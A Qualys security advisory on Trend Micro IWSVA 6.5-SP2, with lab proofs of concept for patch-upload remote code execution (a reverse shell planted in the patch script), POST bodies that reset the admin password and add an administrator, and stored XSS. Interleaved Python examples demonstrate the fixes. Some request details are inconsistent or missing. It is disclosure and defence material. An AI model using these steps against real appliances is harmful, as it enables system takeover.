Qualys Security Advisory QSA-2016-10-26 


October 26, 2016 


Multiple Vulnerabilities in Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x


SYNOPSIS: 


TrendMicro Interscan Web Security Virtual Appliance (IWSVA) suffers from Remote Command Execution
(RCE), Privilege Escalation and Stored Cross-Site Scripting vulnerabilities.


Reference: http://downloadcenter.trendmicro.com/?prodid=86&regs=NABU


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target Hostname: TrendMicroIWSVA6.5SP2
2. Target IP Address: 192.168.253.150 
3. Kali Machine IP: 192.168.253.136 


Vulnerable/Tested Version: 


Interscan Web Security Virtual Appliance version 6.5-SP2 Build Linux 1707. Older versions are also
affected.


[Screenshot: IWSVA web console (http://192.168.253.150:1812/index.jsp), System Updates page, showing the
patch level of the test appliance]

Current IWSVA Information:
  Host Name:            TrendMicroIWSVA6.5SP2
  OS Version:           3.5.1321.el6.x86_64
  Application Version:  6.5-SP2 Build Linux 1707
  Last Updated:         10/25/16 10:06:16 PM

Application Patches installed:
  Patch1   IWSVA 6.5SP2 EN Patch 1 Build 1707         10/25/16 10:06:16 PM
  hfb1622  IWSVA 6.5-SP2 Hot Fix Build 1622           10/25/16 9:59:53 PM
  cpb1620  IWSVA 6.5-SP2 Critical Patch Build 1620    10/25/16 9:55:19 PM
  spb1608  IWSVA 6.5-SP2 Critical Patch Build 1608    10/25/16 9:44:12 PM


Note: All the vulnerabilities mentioned in this report were tested with a least privileged user account ‘test’. This
user has ‘Reports Only’ role assigned.


Vulnerability 1: Remote Command Execution (RCE)


An authenticated remote user with least privilege/role (a user with ‘Reports only’ role) can gain a ‘root’
shell on the system.


Risk Factor: High 


Impact: 


An attacker with low privileges can abuse the Patch Installation functionality to execute commands on the
system remotely and gain a ‘root’ shell.


CVSS Score: AV:N/AC:L/AU:S/C:C/I:C/A:C 


Proof-Of-Concept: 


1. Log into IWSVA web console with least privilege user ‘test’. 


2. Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session.

[Screenshot: request headers of the logged-in session]

Request Headers:

Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1


3. Download a product patch from TrendMicro download center: 
http://downloadcenter.trendmicro.com/?prodid=86&regs=NABU 


4. I downloaded ‘iwsva-65-sp2-ar64-en-cpb1620.tgz’ and renamed it to ‘iwsva-65-sp2-ar64-en-cpb1624.tgz’ 
just to indicate a higher patch. 


5. Open this file in Archive Manager and locate ‘stargate_patch_apply.sh’ shell script. 


6. Edit this script, remove all the code and add a bash one-liner reverse shell.

Here, 192.168.253.136 is the Kali machine’s IP address, which is listening on port 443 for the reverse shell.


7. Now edit the ‘stargate_patch.ini’ file to update build versions from 1620 to 1624. This may not be
necessary but I preferred to update the file anyway.

[Screenshot: ‘stargate_patch.ini’ excerpt, beginning "#! ini_util.sh"]


8. This changes the MD5 hash of the ‘stargate_patch.tgz’ file, and it seems that there is a server-side validation
wherein the server computes the file hash and checks whether it matches the one in the ‘MD5SUM.txt’
file. This ‘MD5SUM.txt’ file is in the same ‘iwsva-65-sp2-ar64-en-cpb1624.tgz’ patch update file.


9. Calculate the MD5 hash of the ‘stargate_patch.tgz’ file, as it has been modified, and put it in the ‘MD5SUM.txt’ file.
10. Create a ‘patch_upload.html’ which is a file upload form and put it in document root on Kali machine.

<html>
<body>
<form action="http://192.168.253.150:1812/servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload" method="post" enctype="multipart/form-data">
Select patch to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload Patch" name="submit">
</form>
</body>
</html>


11. Open a new browser tab and access this page. Select the ‘iwsva-65-sp2-ar64-en-cpb1624.tgz’ to upload.

[Screenshot: the multipart upload request to /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload]

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=71772542910375
Content-Length: 4678950

--71772542910375
Content-Disposition: form-data; name="fileToUpload"; filename="[illegible in screenshot; the renamed patch archive from step 11]"
Content-Type: application/x-compressed

[binary archive body omitted; a tar member named ...sp2_ar64_en_criticalpatch_b1624.tar is visible in the screenshot]
--71772542910375--

[Screenshot: Firefox Network panel and Burp Suite Repeater (Target: http://192.168.253.150:1812) showing the
follow-up POST to /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload issued from the Reports page,
with Content-Type: application/x-www-form-urlencoded; charset=UTF-8, X-Requested-With: XMLHttpRequest,
Referer: http://192.168.253.150:1812/log/page/dashboard.html and Content-Length: 107]


Note: The Session ID cookie was automatically sent as the ‘test’ user was already logged in another browser
tab. Also, this POST request to apply/update the patch usually has ‘CSRFGuardToken’ in the POST body,
but removing it does NOT prevent you from uploading the patch.


12. Got root shell on Kali machine. 
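Steps 8 and 9 describe the only validation the upload went through: the server recomputes the MD5 of stargate_patch.tgz and compares it with the MD5SUM.txt carried in the same archive, so whoever controls the archive controls the reference value. The following Python is an added example, not Qualys's or Trend Micro's code. It builds two such bundles in memory (member names from the advisory, payloads constructed) and shows that the in-archive check accepts both, while a check against a reference obtained out of band (a pinned SHA-256 set standing in for a vendor-published manifest, an assumption of this example) accepts only the genuine one.

```python
"""Added example (not Qualys's or Trend Micro's code): a checksum shipped
inside the uploaded archive cannot authenticate that archive.

Two bundles are constructed in memory, a "vendor" bundle and a tampered
copy. Each carries an MD5SUM.txt that matches its own inner
stargate_patch.tgz, so a check that reads the reference hash out of the
upload passes for both. A check whose reference comes from outside the
upload (here a pinned set standing in for a vendor-published manifest,
an assumption) accepts only the genuine bundle.
"""
import hashlib
import io
import tarfile


def _add_bytes(tar: tarfile.TarFile, name: str, data: bytes) -> None:
    """Add an in-memory file to an open tar archive."""
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))


def build_bundle(script_body: bytes) -> bytes:
    """Build an outer .tgz containing stargate_patch.tgz plus MD5SUM.txt.
    The inner archive holds stargate_patch_apply.sh with script_body
    (member names follow the advisory; contents are constructed)."""
    inner = io.BytesIO()
    with tarfile.open(fileobj=inner, mode="w:gz") as t:
        _add_bytes(t, "stargate_patch_apply.sh", script_body)
    inner_bytes = inner.getvalue()
    # The MD5SUM.txt line is written by whoever builds the bundle, so it
    # always agrees with the inner archive it travels with.
    md5line = hashlib.md5(inner_bytes).hexdigest().encode() + b"  stargate_patch.tgz\n"
    outer = io.BytesIO()
    with tarfile.open(fileobj=outer, mode="w:gz") as t:
        _add_bytes(t, "stargate_patch.tgz", inner_bytes)
        _add_bytes(t, "MD5SUM.txt", md5line)
    return outer.getvalue()


def _members(bundle: bytes) -> dict:
    """Map member name -> bytes for every regular file in the outer archive."""
    with tarfile.open(fileobj=io.BytesIO(bundle), mode="r:gz") as t:
        return {m.name: t.extractfile(m).read() for m in t.getmembers() if m.isfile()}


def weak_check(bundle: bytes) -> bool:
    """The validation the advisory describes: hash stargate_patch.tgz and
    compare with the value in MD5SUM.txt taken from the SAME upload."""
    files = _members(bundle)
    expected = files["MD5SUM.txt"].split()[0].decode()
    return hashlib.md5(files["stargate_patch.tgz"]).hexdigest() == expected


def strong_check(bundle: bytes, trusted_sha256: set) -> bool:
    """Reference value comes from outside the upload (pinned set standing
    in for a vendor-published, signed manifest) and uses SHA-256, not MD5."""
    return hashlib.sha256(bundle).hexdigest() in trusted_sha256


# Constructed sample bundles: the genuine one and a copy with a replaced script.
VENDOR_BUNDLE = build_bundle(b"#!/bin/sh\necho 'applying vendor patch'\n")
TAMPERED_BUNDLE = build_bundle(b"#!/bin/sh\necho 'replaced script'\n")
# What the appliance would hold from an out-of-band channel (assumption).
TRUSTED_SHA256 = {hashlib.sha256(VENDOR_BUNDLE).hexdigest()}


def demo() -> dict:
    """Run both checks against both bundles."""
    return {
        "weak_vendor": weak_check(VENDOR_BUNDLE),
        "weak_tampered": weak_check(TAMPERED_BUNDLE),
        "strong_vendor": strong_check(VENDOR_BUNDLE, TRUSTED_SHA256),
        "strong_tampered": strong_check(TAMPERED_BUNDLE, TRUSTED_SHA256),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The pinned set is the simplest stand-in; in practice the reference would be a vendor-signed manifest verified with a public key baked into the appliance, which has the same property that matters here: the value the server compares against is not something the uploader can rewrite. Any patch-install feature should also be restricted to administrator roles, which is the other control missing in this report.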
Vulnerability 2: Privilege Escalation via ‘UpdateAccountAdministration’ functionality


An authenticated remote user with least privilege/role (a user with ‘Reports only’ role) can change Master 
Admin's password. 


Risk Factor: 


Impact: 


An attacker with low privileges can change Master Admin’s password by sending a specially crafted POST 
request. An attacker can then have full control over the system. 


CVSS Score: AV:N/AC:L/AU:S/C:C/I:C/A:C 
Proof-Of-Concept: 
1. Log into IWSVA web console with least privilege user ‘test’. 


2. Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session. 


3. Send the following POST request using BurpSuite Repeater with the ‘CSRFGuardToken’ and ‘JSESSIONID’
values obtained earlier. Follow redirections in BurpSuite to complete the request.


allaccount=test&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=cba123&PASS2=cba123&description=Master+Administrator&role_select=0&roleid=0


4. Master Admin’s password updated successfully. 
[Screenshot: POST http://192.168.253.150:1812/uilogonsubmit.jsp]

Request Headers:
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Request Body:

Content-Type: application/x-www-form-urlencoded
Content-Length: 60

wherefrom=&wronglogon=no&uid=test&passwd=noahpass&ipwd=Log+On


5. Log into IWSVA web console as ‘admin’ and new password ‘cba123’ to confirm if it works. 


Vulnerability 3: Privilege Escalation via ‘UpdateAccountAdministration’ functionality 


An authenticated remote user with least privilege/role (a user with ‘Reports only’ role) can add a privileged
user with Administrator role.


Risk Factor: HIGH 


Impact: 


An attacker with low privileges can gain administrative privileges by sending a specially crafted POST request.
An attacker can then have full control over the system.


CVSS Score: AV:N/AC:L/AU:S/C:C/I:C/A:C 


Proof-Of-Concept: 


1. Log into IWSVA web console with least privilege user ‘test’.

2. Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session.

[Screenshot: request headers of the logged-in session, showing Referer: http://192.168.253.150:1812/logon.jsp,
Cookie, Connection, Upgrade-Insecure-Requests: 1 and Pragma: no-cache]

3. Send the following POST request using BurpSuite Repeater with the ‘CSRFGuardToken’ and ‘JSESSIONID’
values obtained earlier. Follow redirections in BurpSuite to complete the request.


admin&accountType=local&accountnamelocal=hacker4&accounttype=0&password_changed=true&PASS1=pass1234&PASS2=pass1234&description=hackerUser&role_select=1&roleid=1


5. It shows user ‘hacker’ added successfully. 


6. Now log into IWSVA web console as admin from another browser and check to see if user ‘hacker’ has been 
added successfully. 
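Vulnerabilities 2 and 3 are the same missing control seen twice: the ‘UpdateAccountAdministration’ handler acts on whatever accountname/accountnamelocal and roleid the form carries without asking who the caller is. The Python below is an added example, not Trend Micro's code, of the decision such a handler has to make before touching an account: verify the session's CSRF token (the note under Vulnerability 1 reports the patch servlet accepted requests with ‘CSRFGuardToken’ removed), then allow cross-account and role changes only to administrators and self-service password changes to everyone else. The field names and the two POST bodies are the advisory's; the Session class, the role id assumed for ‘Reports only’ (2) and the function names are this example's assumptions.

```python
"""Added example (not Trend Micro's code): the server-side checks an
account-update endpoint must make before acting on the advisory's form
fields. Field names and request bodies come from the advisory; the
session model, the 'Reports only' role id and all function names are
assumptions of this example."""
import hmac
import secrets
from urllib.parse import parse_qs

# Role ids as they appear in the advisory's POST bodies; the
# 'Reports only' value is an assumption.
ROLE_MASTER_ADMIN = 0
ROLE_ADMIN = 1
ROLE_REPORTS_ONLY = 2
PRIVILEGED_ROLES = {ROLE_MASTER_ADMIN, ROLE_ADMIN}


class Session:
    """Minimal server-side session: logged-in user, role, issued CSRF token."""
    def __init__(self, user: str, roleid: int):
        self.user = user
        self.roleid = roleid
        self.csrf_token = secrets.token_hex(16)


def check_csrf(session: Session, form: dict) -> bool:
    # A missing token fails closed; constant-time compare for the present case.
    supplied = form.get("CSRFGuardToken", [""])[0]
    return bool(supplied) and hmac.compare_digest(supplied, session.csrf_token)


def target_account(form: dict) -> str:
    # Local accounts are named in accountnamelocal, existing ones in accountname
    # (both field names taken from the advisory's bodies).
    return form.get("accountnamelocal", form.get("accountname", [""]))[0]


def authorize(session: Session, form: dict) -> tuple:
    """Return (allowed, reason). Administrators may manage any account;
    everyone else may only change their own password, never their role."""
    if session.roleid in PRIVILEGED_ROLES:
        return True, "admin may manage accounts"
    if target_account(form) != session.user:
        return False, "non-admin may only modify own account"
    requested_role = form.get("roleid", [None])[0]
    if requested_role is not None and int(requested_role) != session.roleid:
        return False, "non-admin may not change own role"
    return True, "self-service change"


def handle_account_update(session: Session, body: str) -> str:
    """Decision for one request body; returns 'accepted: ...' or 'rejected: ...'."""
    form = parse_qs(body, keep_blank_values=True)
    if not check_csrf(session, form):
        return "rejected: missing or invalid CSRFGuardToken"
    allowed, reason = authorize(session, form)
    if not allowed:
        return "rejected: " + reason
    p1, p2 = form.get("PASS1", [""])[0], form.get("PASS2", [""])[0]
    if form.get("password_changed", ["false"])[0] == "true" and p1 != p2:
        return "rejected: PASS1 and PASS2 differ"
    return "accepted: " + reason


def with_token(session: Session, body: str) -> str:
    """Append the session's own CSRF token, as a legitimate page would."""
    return body + "&CSRFGuardToken=" + session.csrf_token


# The two POST bodies from the advisory (Vulnerability 2 and Vulnerability 3).
CHANGE_ADMIN_PASSWORD = ("allaccount=test&accountname=admin&commonname=admin&accounttype=0"
                         "&password_changed=true&PASS1=cba123&PASS2=cba123"
                         "&description=Master+Administrator&role_select=0&roleid=0")
ADD_ADMIN_USER = ("accountType=local&accountnamelocal=hacker4&accounttype=0"
                  "&password_changed=true&PASS1=pass1234&PASS2=pass1234"
                  "&description=hackerUser&role_select=1&roleid=1")


def demo() -> dict:
    """Run the advisory's bodies through the handler as different callers."""
    reports_only = Session("test", ROLE_REPORTS_ONLY)
    admin = Session("admin", ROLE_MASTER_ADMIN)
    own_password = ("accountname=test&password_changed=true&PASS1=new-pw&PASS2=new-pw"
                    "&roleid=%d" % ROLE_REPORTS_ONLY)   # constructed self-service body
    return {
        "v2_by_reports_user": handle_account_update(reports_only, with_token(reports_only, CHANGE_ADMIN_PASSWORD)),
        "v3_by_reports_user": handle_account_update(reports_only, with_token(reports_only, ADD_ADMIN_USER)),
        "v2_without_token": handle_account_update(reports_only, CHANGE_ADMIN_PASSWORD),
        "v2_by_admin": handle_account_update(admin, with_token(admin, CHANGE_ADMIN_PASSWORD)),
        "self_password_change": handle_account_update(reports_only, with_token(reports_only, own_password)),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(case, "->", outcome)
```

The authorization decision is made from the session, never from form fields such as allaccount or role_select: anything the client sends describes what it wants, not what it is entitled to. A ‘Reports only’ session therefore gets both of the advisory's bodies rejected, while the same admin-password body is accepted when the caller's session actually belongs to an administrator.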
Vulnerability 4: Stored Cross-Site Scripting (XSS) in ‘UpdateAccountAdministration’ functionality


An authenticated remote attacker can inject JavaScript while creating a new user, which results in a stored cross-site
scripting attack.


Risk Factor: Medium 


Impact: 


An attacker with low privileges can inject malicious JavaScript by sending a specially crafted POST request to
add a new user (which he shouldn’t be able to do, as per Vulnerability #1 mentioned above).


Vulnerable Parameters:


a. accountnamelocal
b. description


Note: Other parameters may be vulnerable. 

CVSS Score: AV:N/AC:L/AU:S/C:C/I:C/A:C 
Proof-Of-Concept: 

1. Log into IWSVA web console with least privilege user ‘test’. 


2. Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session. 


3. Send the following POST request using BurpSuite Repeater with the ‘CSRFGuardToken’ and ‘JSESSIONID’
values obtained earlier. Follow redirections in BurpSuite to complete the request.


4. It shows user ‘hacker4’ added successfully. 


5. Now log into IWSVA web console as admin from another browser and check to see if user ‘hacker4’ has been
added successfully and the JavaScript executes.
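The two parameters listed as vulnerable, accountnamelocal and description, are stored on creation and rendered later in the admin's account list, which is where the injected script runs. The Python below is an added example, not Trend Micro's code, of the two controls that close this: an allow-list on the field that has a natural shape (account names) and HTML escaping of every stored value at the point of output (descriptions are free text, so they are kept as entered and neutralised when rendered). The policy regex, the table markup and the sample accounts are assumptions or constructed for the example.

```python
"""Added example (not Trend Micro's code): input validation and output
encoding for the two stored-XSS parameters named in the advisory.
The name policy, the rendered markup and the sample accounts are
assumptions/constructed."""
import html
import re

# Assumed policy: account names are short identifiers, never markup.
ACCOUNT_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")
DESCRIPTION_MAX = 256


def validate_account_form(form: dict) -> list:
    """Return the list of validation errors for an account-creation form
    (keys as in the advisory: accountnamelocal, description)."""
    errors = []
    name = form.get("accountnamelocal", "")
    if not ACCOUNT_NAME_RE.fullmatch(name):
        errors.append("accountnamelocal: only letters, digits, '_', '.' and '-' are allowed")
    if len(form.get("description", "")) > DESCRIPTION_MAX:
        errors.append("description: longer than %d characters" % DESCRIPTION_MAX)
    return errors


def render_account_row(name: str, description: str) -> str:
    # Escape at output time, regardless of what validation ran on input;
    # quote=True also covers values that end up inside attributes.
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(name, quote=True),
        html.escape(description, quote=True),
    )


def render_account_table(accounts) -> str:
    """Render the stored (name, description) pairs as the admin's account list."""
    return "<table>" + "".join(render_account_row(n, d) for n, d in accounts) + "</table>"


# Constructed sample: a legitimate account and one whose description
# carries markup of the kind the advisory says was stored and executed.
SAMPLE_ACCOUNTS = [
    ("admin", "Master Administrator"),
    ("hacker4", "<script>alert(1)</script>"),
]


def demo() -> dict:
    """Show that stored markup reaches the page only in escaped form and
    that a markup-bearing account name is rejected on input."""
    page = render_account_table(SAMPLE_ACCOUNTS)
    return {
        "script_tag_in_output": "<script>" in page,
        "escaped_in_output": "&lt;script&gt;" in page,
        "errors_hostile_name": validate_account_form({"accountnamelocal": "<b>x</b>", "description": ""}),
        "errors_good_name": validate_account_form({"accountnamelocal": "hacker4", "description": "hackerUser"}),
    }


if __name__ == "__main__":
    print(render_account_table(SAMPLE_ACCOUNTS))
    print(demo())
```

Validation on accountnamelocal and escaping on both fields are independent layers: the allow-list stops markup from being stored under a field that never legitimately contains it, and escaping guarantees that whatever does get stored (including a description typed by an administrator) is displayed as text. Neither replaces the authorization check that should have kept a ‘Reports only’ user from creating accounts in the first place.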